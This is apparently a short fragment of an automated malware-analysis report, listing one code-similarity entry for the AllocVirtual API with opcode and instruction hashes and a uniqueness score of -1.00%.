                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: 5870d79ba02e1a25a039791317dfab8b233fd86703b5ebe479e284bbe8979977
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: 6361136270129087EAA8CFD5D89476DB395FB44BA8F94C42ADB8D077E5DA38EC52C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%